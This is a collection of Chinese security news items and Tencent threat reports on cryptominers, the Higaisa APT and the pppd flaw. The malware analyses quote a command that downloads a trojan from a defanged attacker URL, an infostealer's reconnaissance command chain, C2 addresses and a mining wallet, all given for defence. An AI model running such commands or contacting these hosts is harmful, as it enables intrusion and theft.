根据网络安全公司Palo Alto Networks周二发布的一项研究显示，医院中连接互联网的成像设备有很大一部分运行过时的操作系统。该公司发现，83%的这些设备运行在过时的软件上，即使这些软件包含黑客可以利用的已知漏洞，也无法更新。 与2018年相比，该数字显着增加，这与微软今年早些时候终止对Windows 7的支持相吻合。相当多的电脑都运行甚至更老的操作系统，包括Windows XP，微软于2014年停止了对Windows XP的支持。成像设备包括进行X射线，MRI，乳房X线照片和CAT扫描，它们都需要电脑提供支持和控制。 安全专家表示，保持操作系统更新是使黑客远离设备的最重要步骤之一。但是，更新停止发布时，黑客却不会停止寻找可利用的漏洞。当最终黑客找到了可以破坏过时操作系统的漏洞时，制造商有时仍会提供更新，但不能保证一定会提供更新。 黑客可能有多种动机将医院中的设备作为目标。其中，成像和其他医疗设备（例如输液泵和患者监控系统）都可能容易受到勒索软件攻击，并指出医院已经遭受了勒索软件攻击，他们锁定了系统并要求付费才能重新拿回控制权。他们还可以利用医院电脑的计算能力来挖掘加密货币，这种攻击称为“加密劫持”。这可能会导致设备过热或故障。 这项研究调查了医院和其他企业中总共有120万个互联网连接设备。商业分析公司Gartner表示，这是48亿个互联网连接设备中的一小部分。该研究没有提及成像设备的特定品牌。研究人员表示，医院可能难以更新其成像设备，因它们无法直接从像微软这样的软件制造商那里购买。相反，他们必须依靠向第三方出售设备的供应商来提供补丁，这是一个需要改进的过程。   (稿源：cnBeta，封面源自网络。）

一个影响点对点协议守护程序（Point-to-Point Protocol daemon，pppd）软件，并具有 17 年历史的远程代码执行（remote code execution，RCE）漏洞已对几个基于 Linux 的操作系统造成了影响。Pppd 软件不仅预先安装在大多数 Linux 系统中，而且还为流行的网络设备的固件提供 power。 该 RCE 漏洞由 IOActive 的安全研究人员 Ija Van Sprundel 发现，其严重之处在于，由守护程序软件的可扩展身份验证协议（EAP）数据包解析器中的逻辑错误所导致的堆栈缓冲区溢出漏洞。 根据 US-CERT 发布的咨询报告表示，该漏洞已被标记为 CVE-2020-8597。在严重程度方面，CVSS 则将其评为 9.8 分。 将一个 crooked EAP 打包程序发送到目标 pppd 客户端或服务器后，黑客就可以对此漏洞进行利用。其可以利用此漏洞并在受影响的系统上远程执行任意代码，从而接管系统的全部控制权。 而加重该漏洞严重程度的是，点对点协议守护程序通常具有很高的特权。这也就导致一旦黑客通过利用该漏洞控制服务器，就可以获得 root-level 的访问特权。 据 Sprundel 透露，该漏洞在 2.4.2 到 2.4.8 的 pppd 版本或过去 17 年中发布的所有版本中都一直存在。他已经确认以下 Linux 发行版已受到 pppd 漏洞的影响： Ubuntu Debian Fedora SUSE Linux Red Hat Enterprise Linux NetBSD 此外，还有以下设备也附带了受影响的 pppd 版本，并且容易受到攻击： TP-LINK products Synology products Cisco CallManager OpenWRT Embedded OS 建议用户们在补丁发布后尽快更新其系统，以规避潜在的攻击。   （稿源：开源中国，封面源自网络。）

据消费者监管机构透露，如果你仍在运行 Android 6.0 或更早版本，则会容易受到恶意软件的攻击。目前来看，全球有超过十亿的 Android 设备不再受到安全更新的支持，它们都是十分容易受到攻击的对象。 据统计，40% 的 Android 设备不再从 Google 接收到重要的安全更新，这使它们面临更大的恶意软件或其他安全漏洞风险。Android 10 是目前最新的版本，虽然它和其前身 Android 9 (Pie) 及 8 (Oreo) 仍在接收安全更新，但使用低于 Android 8 的任何设备都会带来安全风险。 根据 Google 去年公布的数据，全球约 40％ 的 Android 活跃用户使用的是 6.0 或更早版本：Marshmallow (2015), Lollipop (2014), KitKat (2013), Jellybean (2012), Ice Cream Sandwich (2011) 以及 Gingerbread (2010)。而根据《 Android 安全公告》中的政策，2019年未发布针对 7.0 以下版本(Nougat)的 Android 系统的安全补丁。 这就意味着，全球有超过 10 亿部手机和平板电脑处于活跃状态，但不会再收到安全更新。有人购买了许多已使用三年的 Android 设备进行了验证，其中大多数只能运行 Android 7.0。结果显示，消费者团体聘请的安全专家能够用恶意软件感染所有设备，其中一些设备还会被多次感染。 测试中的所有手机均被 Joker（也称为 Bread）恶意软件成功感染，此外，被测试的每台设备也都被 Bluefrag 感染了，这是一个严重的安全漏洞，主要针对 Android 蓝牙组件。 事实上，对于应该为智能设备提供多长时间的更新，以便消费者可以做出明智的购买决定，并且一旦不再提供安全更新，客户如何获得有关其选择的更好信息等此类问题，应该具有更大的透明度。 谷歌表示，他们一直在致力于提升 Android 设备的安全性。他们每月都会提供安全更新、错误修复和其他保护措施，并持续与硬件和运营商合作伙伴保持合作，以确保 Android 用户能获得快速、安全的使用体验。 不过交付操作系统安全更新的时间取决于设备、制造商和移动运营商。由于智能手机制造商会对 Android 操作系统的某些部分进行定制，因此他们部署补丁和更新的速度通常比谷歌在自己设备上部署的速度更慢，或者根本没有部署。   （稿源：开源中国，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/yNiGdnLDbKE9lm_iZVOxPA   一、概述 近日某企业Linux服务器出现卡慢，CPU占用高等现象，向腾讯安全威胁情报中心求助。工程师征得客户同意对该企业网络运行情况进行安全审计。通过对故障服务器进行安全检查，发现该服务器遭遇SSH弱密码爆破入侵。入侵者植入定时任务实现持久化，定时任务下载执行病毒母体INT, INT内置了多个bash命令，会进一步下载执行Linux挖矿木马SystemMiner。 此外入侵者还会利用运维工具ansible、knife等执行命令批量攻击感染内网其他机器,会尝试下载脚本卸载腾讯云云镜、阿里云安骑士等安防产品以实现自保护，入侵者还会修改hosts文件屏蔽其他挖矿网址以独占挖矿资源。 二、病毒分析 1.    入侵阶段 腾讯安全运维专家通过查看失陷主机相关日志，发现入侵者尝试数短时间内爆破SSH接近三千次，爆破入侵成功后会创建执行定时任务kpccv.sh。 2.    持久化 通过创建定时任务实现持久化，定时任务为sh脚本，脚本内容经过base64编码加密。定时任务执行周期为59分钟以内的一个随机数值。 Kpccv.sh经过bash64加密，其主要功能是下载病毒母体INT执行。为了避免下载地址失效，内置了多个下载地址。tencentxjy5kpccv.拼接tor2web.io，tor2web.in等得到完整的下载链接。 Kpccv.sh解密后的内容如下: 3.    病毒母体INT分析 INT为ELF格式可执行文件，运行后创建一子进程执行，内置了多个bash命令，经base64编码加密，每个bash脚本命令都对应着完整的功能模块,下文依次分析每个bash命令实现的具体功能。 3.1 本地持久化 该bash模块主要功能是实现本地持久化,创建定时任务0kpccv,定时任务执行周期为59分钟以内的一个随机数值。定时任务执行kpccv.sh脚本,写入脚本的内容经过了base64编码，其主要功能是下载执行病毒母体INT。 Base64解码后的bash脚本： 3.2 内网渗透&自保护 利用运维工具ansible、knife、salt执行命令实现对内网机器批量感染，执行命令经过base64编码，解码后其功能为下载执行病毒母体INT 下载脚本尝试卸载腾讯云云镜、阿里云安骑士等安全防护产品以实现自保护。 下载可执行文件bot,trc模块执行，目前下载链接已失效。 3.3  清理其他挖矿木马&屏蔽矿池网址 该模块主要功能是清理机器上的挖矿木马，并且修改hosts文件，将常见的挖矿网址systemten.org、pm.cpuminerpool.com等映射到ip地址0.0.0.0，以实现屏蔽其他挖矿网址实现独占系统资源。 3.4 下载执行挖矿木马 执行最核心的功能，下载执行挖矿木马。下载链接通过拼接而成，tencentxjy5kpccv.拼接tor2web.io等，挖矿模块cpu为ELF格式可执行文件。 执行门罗币挖矿，矿池配置如下： 三、安全建议 腾讯安全专家建议各企业对Linux服务器做以下加固处理： 1.采用高强度的密码，避免使用弱口令，并建议定期更换密码。建议服务器密码使用高强度无规律密码，并强制要求每个服务器使用不同密码管理； 2.排查相关Linux服务器是否有kpccv等相关定时任务，有则结束相关进程，清理相关木马文件； 3.在终端/服务器部署专业安全防护软件，Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务平台。 4.推荐企业部署腾讯T-Sec高级威胁检测系统（腾讯御界）及时捕捉黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） IOCs: MD5: 177e3be14adcc6630122f9ee1133b5d3 e5f8c201b1256b617974f9c1a517d662 b72557f4b94d500c0cd7612b17befb70 域名: tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.to tencentxjy5kpccv.t.tor2web.in tencentxjy5kpccv.t.onion.to tencentxjy5kpccv.t.onion.in.net tencentxjy5kpccv.t.civiclink.network tencentxjy5kpccv.t.onion.nz tencentxjy5kpccv.t.onion.pet tencentxjy5kpccv.t.onion.ws tencentxjy5kpccv.t.onion.ly 矿池: 136.243.90.99:8080

Let’s Encrypt 刚刚宣布，其将于 3 月 4 日起撤销大量 TLS / TTS 证书，并正在向受影响的客户发邮件告知，以便其及时地更新。2 月底的时候，该机构公布起在 CAA 代码中发现了一个 bug，因此需要吊销这部分证书。为避免业务中断，Let’s Encrypt 建议客户在 3 月 4 日前更换受影响的证书，否则网站访客会看到一个与证书失效有关的安全警告。 Let’s Encrypt 在邮件中写道：很遗憾，这意味着我们需要撤销受此错误影响的一批证书，其中包括您的一个或多个证书。因此造成的不便，我们深表歉意。 如果客户无法在证书被吊销（3 月 4 日）前更新，网站访客将看到安全警告，直到证书再次更新。新证书的续签流程，可以在 ACME 文档中找到。 你也可以通过官方工具来查看是否需要更新证书，或者道论坛翻阅相关主题。如有其它疑问，可在撰写帖子时，于模板中发起提问。 据悉，这批证书的吊销时间为世界标准时（UTC）3 月 4 日 00:00 整。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/895.html   一、背景概述 腾讯安全威胁情报中心检测到“higaisa（黑格莎）”APT组织在被披露后经过改头换面再次发动新一轮的攻击，在这轮攻击中，该组织舍弃了使用多年的dropper，完全重写了攻击诱饵dropper，此外还引入了dll侧加载（白加黑）技术对抗安全软件的检测和查杀。 “Higaisa（黑格莎）”组织是腾讯安全2019年披露的一个来自朝鲜半岛的专业APT组织，因为其常用higaisa作为加密密码而得名。该组织具有政府背景，其活动至少可以追溯到2016年，且一直持续活跃到现在。该组织常利用节假日、朝鲜国庆等朝鲜重要时间节点来进行钓鱼活动，诱饵内容包括新年祝福、元宵祝福、朝鲜国庆祝福，以及重要新闻、海外人员联系录等等。被攻击的对象包括跟朝鲜相关的外交实体（如驻各地大使馆官员）、政府官员、人权组织、朝鲜海外居民、贸易往来人员等，受害国家包括中国、朝鲜、日本、尼泊尔、新加坡、俄罗斯、波兰、瑞士等。 二、基础信息   文件名 MD5 功能/属性 Happy-new-year-2020.scr 2173b589b30ba2b0242c82c9bcb698b2 dropper Rekeywiz.exe 082ed4a73761682f897ea1d7f4529f69 白文件，用于+加黑 Duser.dll 5de5917dcadb2ecacd7ffd69ea27f986 Downloader cspwizres.exe 54c0e4f8e59d1bd4c1e0d5884b173c42 窃密木马 2020-New-Year-Wishes-For-You.scr 37093D3918B0CC2CA9805F8225CCCD75 dropper Duser.dll 01B90259A9771D470582073C61773F30 Downloader 390366d02abce50f5bb1df94aa50e928 390366d02abce50f5bb1df94aa50e928 Gh0st trojan bbf9822a903ef7b9f33544bc36197594 bbf9822a903ef7b9f33544bc36197594 Gh0st trojan 0a15979a72f4f11ee0cc392b6b8807fb 0a15979a72f4f11ee0cc392b6b8807fb Gh0st trojan 739a40f8c839756a5e6e3c89b2742f8e 739a40f8c839756a5e6e3c89b2742f8e Gh0st trojan 三、鱼叉攻击 与以往的攻击手段类似，“higaisa（黑格莎）”依然以节假日祝福为主题诱饵进行鱼叉钓鱼攻击，最近抓获的攻击邮件主题为“Happy new year 2020”、“2020 New Year Wishes For You”等，欺骗用户下载并打开附件。 附件解压后得到木马诱饵名为Happy-new-year-2020.scr、2020-New-Year-Wishes-For-You.scr，运行后释放并打开与主体相对应的图片欺骗受害者。 四、木马行为分析 1.Dropper 1）2020-New-Year-Wishes-For-You.scr与Happy-new-year-2020.scr功能类似 可能由于被曝光的原因，该组织对dropper进行了重写，舍弃了原来将payload存放在资源及使用“higaisa”作为密钥进行rc4解密的方式，直接从数据段中解密（XOR 0x1A）释放恶意文件到指定目录并执行。释放的恶意文件如下： %ALLUSERSPROFILE%\CommonDatas\Rekeywiz.exe（白） %ALLUSERSPROFILE%\CommonDatas\Duser.dll（黑） %TEMP%\Happy-new-year-2020.jpg（正常的伪装图片） 2）使用com创建EfsRekeyWizard.lnk到启动目录，指向Rekeywiz.exe实现持久化。 2. Downloader 1）Rekeywiz.exe文件为操作系统白文件，运行时会加载edsadu.dll，该文件也是系统自带文件，edsadu.dll加载过程中会加载Duser.dll，实现白加黑攻击: 2）Duser.dll的InitGadgets接口函数中实现了恶意功能，创建恶意线程: 3）使用RC4解密出C2，然后获取磁盘序列号的CRC32值作为tn参数，获取随机字母为ved参数，向C2发送请求，C2为：hxxp[:]//petuity.shopbopstar.top/research/index.php 及 hxxp[:]//adobeinfo.shopbopstar.top/notice/index.php 4）C2返回的数据也是经过RC4加密的数据，解密后为PE文件，释放到temp目录后执行: 5）其中文件名也来自于C2的返回数据，取数据从后往前第一个’&’之后的字符作为文件名: 6）C2返回的数据实例，与之前的攻击类似：最终下载了infostealer+gh0st RAT 3.Infostealer cspwizres.exe（54c0e4f8e59d1bd4c1e0d5884b173c42）文件主要行为是获取计算机信息，并发送到C2。 1）解密出要执行的命令结果如下：主要用于收集系统信息、网络信息、进程信息、文件信息等systeminfo&ipconfig -all&tasklist&net view&dir c:\&dir c:\users\&dir d:\&dir e:\： 2）创建cmd执行以上命令，并通过管道获取执行结果 3）解密出C2，C2地址与之前的攻击活动相似 4）将获取的信息上传到C2中185.247.230.252： 4. RAT 持续监控中发现，后期攻击者会对不同的受害者下载gh0st改版木马驻留受害者系统，我们目前共在受害机发现3个不同版本的gh0st木马。 版本1: 该木马为gh0st RAT，含有文件管理、进程管理、CMDshell等功能，C2: x1.billbord.net:6539。 版本2： 该木马为gh0st RAT，含有文件管理、进程管理、CMDshell等功能， C2: www.phpvlan.com:8080 版本3： 该木马为gh0st远控改版，只保留插件管理功能，所有功能需插件实现，C2: console.hangro.net:1449。 5. TTP/武器更新 1)Dropper 本轮攻击利用“白+黑”的方式加载Downloader模块：rekeywiz.exe+ Duser.dll 2)Downloader 自腾讯安全御见威胁情报中心公布该组织攻击报告后（https://s.tencent.com/research/report/836.html），该组织对其Downloader进行改版，新一批downloader下载功能均基于老版本的curl开源代码实现： 五、MITRE ATT&CK   Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1035 Service Execution T1204 User Execution T1175 Component Object Model and Distributed COM T1072 Third-party Software Persistence T1179 Hooking T1137 Office Application Startup T1038 DLL Search Order Hijacking T1060 Registry Run Keys / Startup Folder Defense Evasion T1140 Deobfuscate/Decode Files or Information T1107 File Deletion T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1123 Audio Capture T1005 Data from Local System T1114 Email Collection T1056 Input Capture T1113 Screen Capture Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 六、安全建议 我们建议外贸企业及重要机构参考以下几点加强防御： 1、 通过官方渠道或者正规的软件分发渠道下载相关软件； 2、 谨慎连接公用的WiFi网络。若必须连接公用WiFi网络，建议不要进行可能泄露机密信息或隐私信息的操作，如收发邮件、IM通信、银行转账等；最好不要在连接公用WiFi时进行常用软件的升级操作； 3、 提升安全意识，不要打开来历不明的邮件的附件；除非文档来源可靠，用途明确，否则不要轻易启用Office的宏代码； 4、 及时安装操作系统补丁和Office等重要软件的补丁； 5、 使用杀毒软件防御可能的病毒木马攻击，对于企业用户，推荐使用腾讯T-Sec终端安全管理系统(腾讯御点)。腾讯御点内置全网漏洞修复和病毒防御功能，可帮助企业用户降低病毒木马入侵风险； 6、 推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）及时捕捉黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） 七、附录 IOCs 185.247.230.252                        infostealer petuity.shopbopstar.top            downloader adobeinfo.shopbopstar.top    downloader console.hangro.net:1449         gh0st plug www.phpvlan.com:8080          gh0st x1.billbord.net:6539                  gh0st MD5 2173b589b30ba2b0242c82c9bcb698b2 082ed4a73761682f897ea1d7f4529f69 54c0e4f8e59d1bd4c1e0d5884b173c42 4d937035747b4eb7a78083afa06022d3 5de5917dcadb2ecacd7ffd69ea27f986 37093d3918b0cc2ca9805f8225cccd75 01b90259a9771d470582073c61773f30 25c80f37ad9ad235bea1a6ae68279d2e 739a40f8c839756a5e6e3c89b2742f8e 6a0fab5b99b6153b829e4ff3be2d48cd 0a15979a72f4f11ee0cc392b6b8807fb 390366d02abce50f5bb1df94aa50e928 bbf9822a903ef7b9f33544bc36197594 4ff9196bac6bf3c27421af411c57ba52 参考资料 警惕来自节假日的祝福：APT攻击组织”黑格莎（Higaisa）”攻击活动披露 https://mp.weixin.qq.com/s/W87E6_v9YCnsmQWDd7NOHw

Safari将在今年晚些时候不再接受新的长效HTTPS证书，也就是自其创建之日起过13个月有效期的新证书。这意味着使用在截止时间点之后发出的长寿命SSL/TLS证书的网站将在苹果系统的浏览器中引发隐私错误。 苹果在证书颁发机构浏览器论坛（CA / Browser）会议上宣布了该政策。从2020年9月1日开始，任何有效期超过398天的新网站证书都不会受到Safari浏览器的信任，而是会被拒绝。而在截止日期之前颁发的较旧证书不受此规则的影响。 通过在Safari中实施该策略，苹果将会通过扩展在所有iOS和macOS设备上实施该策略。这将对网站管理员和开发人员造成一定影响，他们需要调整接下来的证书运营策略，确保其证书满足苹果的要求，否则可能会影响超过10亿台设备和计算机上的页面访问。 PKI和SSL管理公司Sectigo的高级研究员蒂姆·卡兰（Tim Callan）参加了本周在斯洛伐克举行的会议，他证实了这一消息：“本周，苹果在第49届CA/浏览器论坛宣布，他们的产品将否决在9月1日或之后发行的期限超过398天的证书的有效性。9月1日之前颁发的证书将具有与今天的证书相同的可接受期限，即825天，从而无需对这些证书采取任何措施。” 苹果，谷歌和CA/Browser的其他成员已经考虑了缩短证书有效期的问题，该政策有其优点和缺点。 此举的目的是通过确保开发人员使用具有最新加密标准的证书来提高网站的安全性，并减少可能被盗用并重新用于网络钓鱼和恶意驱动程序攻击的旧的、被忽略的证书的数量，短期证书将确保人们在大约一年内迁移到更安全的证书。 缩短证书的使用寿命确实存在一些缺点，通过增加证书替换的频率，苹果和其他公司也使得使用加密证书的网站所有者和企业的管理周期变得更加复杂。不过，“公司可以依靠自动化来协助证书的部署，更新和生命周期管理，以减少人员开销和随着证书更换频率的增加而出现错误的风险。”例如，Let’s Encrypt发行了免费的HTTPS证书，这些证书通常会在90天后过期，并提供了自动续订的工具，如今它们已在整个Web上使用。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/888.html   一、背景 腾讯安全威胁情报中心检测到“快Go矿工”更新，该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现，最初仅利用“永恒之蓝”漏洞进行攻击传播，因其使用的C2域名中包含“kuai-go”，腾讯安全威胁情报中心将其命名为“快Go矿工”（KuaiGoMiner）。 “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe，截止目前已挖矿获得门罗币47个，市值人民币2万余元。同时，病毒在攻陷机器上植入的gh0st远控木马，具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能，被攻陷的电脑还会面临机密信息泄露的风险。 据腾讯威胁情报中心统计数据，“快Go矿工”（KuaiGoMiner）变种已攻击上万台电脑，受害最严重地区为江苏、山东和广东。 腾讯安全提醒企业用户检查SQL服务器的SA用户口令，切勿配置弱口令登录，快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播，植入远控木马，对政企机构信息系统安全构成严重威胁。 二、漏洞攻击 “快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块，释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具，释放到C:\Windows\Fonts\usa\目录下。 释放成功后go.vbs首先启动，然后执行go.bat，在go.bat中利用服务管理工具NSSM（释放文件名为svchost.exe）将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和 http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址， 请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址，然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。 三、MSSQL爆破 近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击，爆破成功后首先通过shell代码写入vget.vbs作为下载者程序，然后利用vget.vbs下载PE木马sql.exe，下载命令如下： C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe sql.exe为gh0st远控木马，该木马控制电脑后，继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar，然后解压释放文件到目录C:\Windows\Fonts\usa\。 将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”，使用矿池：xmr-eu1.nanopool.org:14433，钱包：4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 目前该钱包已挖矿获取门罗币47.169个，折合人民币28000余元。 四、安全建议 1.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP服务的账号密码，切勿使用弱口令； 2.根据微软公告及时修复以下Windows系统高危漏洞； MS17-010永恒之蓝漏洞 XP、WindowsServer2003、win8等系统访问： http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 建议企业用户使用腾讯T-Sec终端安全管理系统（腾讯御点，下载链接：https://s.tencent.com/product/yd/index.html），个人用户使用腾讯电脑管家进行漏洞扫描和修复。 3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界)，发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） IOCs IP 64.111.27.3 Domain sex.zhzy999.net scan.jiancai008.com s.jiancai008.com go.jiancai008.com URL http[:]//sex.zhzy999.net/sql.exe http[:]//go.jiancai008.com:88/2020/1.rar http[:]//go.jiancai008.com:88/2020/2.rar http[:]//go.jiancai008.com:88/2020/3.rar MD5 1a5ba25af9d21f36cf8b3df7d2f55348 b87af17c857b208fcd801cb724046781 09bf2fef86d96ec9a1c3be0a020ae498 57bd72d6dc95ff57b5321a62b9f7cde2 70d3908f1b9909b7d23ee265e77dd1f9 1f1bc2ec00db3551d7700c05c87956df 05c57ccd23ab3f623bf1adda755af226

NIC.gp 的安全研究员和开发人员 Michel Gaschet 于近日提出，Microsoft 在其数千个子域的管理方面存在问题，存在有许多子域可以被劫持并用于攻击用户、员工或显示垃圾内容。据 ZDNet 报道称，Gaschet 在接受其采访时说，在过去三年中，他一直在向 Microsoft 报告带有错误配置的 DNS 记录的子域，但该公司要么忽略报告，要么就是默默地保护某些子域。 Gaschet 表示，他已经在 2017 年向微软报告了 21 个容易受到劫持的 msn.com 子域 [1, 2]，并在 2019 年报告了 142 个错误配置的 microsoft.com 子域 [1, 2]。此外，他还分享了其于去年向微软报告的 117 个 microsoft.com 子域列表。 Gaschet 透露，在其报告的所有错误配置的子域中，微软仅解决了其中的几个，被修复的数量占比只有他所报告数量的 5％-10％ 左右。并称，该操作系统制造商通常会修复较大的子域，例如 cloud.microsoft.com 和 account.dpedge.microsoft.com，却使其他子域暴露在劫持之下。 他还表示，大多数 Microsoft 子域在其各自的 DNS 条目中容易受到基本错误配置的攻击。Gaschet 称，“根本原因/错误是忘记了 DNS 条目，指向不再存在或根本不存在的内容，例如 DNS 条目内容中的错字。” Gaschet 在 Twitter 上指出，至少有一个垃圾邮件小组已经发现了他们可以劫持 Microsoft 的子域，并通过将其托管在信誉良好的域中来增加其垃圾内容。并表明，他已在至少四个合法的 Microsoft 子域中发现了印度尼西亚扑克赌场的广告，分别为 portal.ds.microsoft.com、perfect10.microsoft.com、ies.global.microsoft.com 和 blog-ambassadors.microsoft.com。 目前，ZDNet 已向微软征求意见，并要求该公司在当日的 Twitter 话题中对 Gaschet 提出的一系列问题发表评论。 Gaschet 在 Twitter 上猜测，微软不优先解决这些问题的原因之一是因为“subdomain takeovers”不属于公司的漏洞悬赏计划的一部分，这意味着即使所报告的问题很严重，这些报告也不会得到优先处理。 同时，Gaschet 敦促微软改变其管理 DNS 记录的方式。并称，这是造成这些错误配置的主要原因。   （稿源：开源中国，封面源自网络。）

Let’s Encrypt是一家得到Mozilla Firefox和Google Chrome支持的自动化证书颁发机构。今天该机构宣布了一项新措施，从而进一步保护用户免受网络攻击的侵害。这项新功能称之为多角度域认证（multi-perspective domain validation），可帮助证书颁发机构（CA）证明申请人对他们想要获得证书的域具有掌控权。 域验证并不是什么新问题，但在验证过程中还存在很多的漏洞，这意味着网络攻击者可以诱使CA机构错误的颁发证书。而通过多角度域认证，网络攻击者需要同时破坏三个不同的网络路径，这不仅大大提高了安全系数，而且在互联网拓扑社区中也能更快发现网络攻击行为。 在新闻稿中，Let’s Encrypt特别感谢了普林斯顿大学的几位研究人员在多角度域验证方面的帮助，并表示将继续与研究人员合作，以改善设计和实施的有效性。   (稿源：cnBeta，封面源自网络。）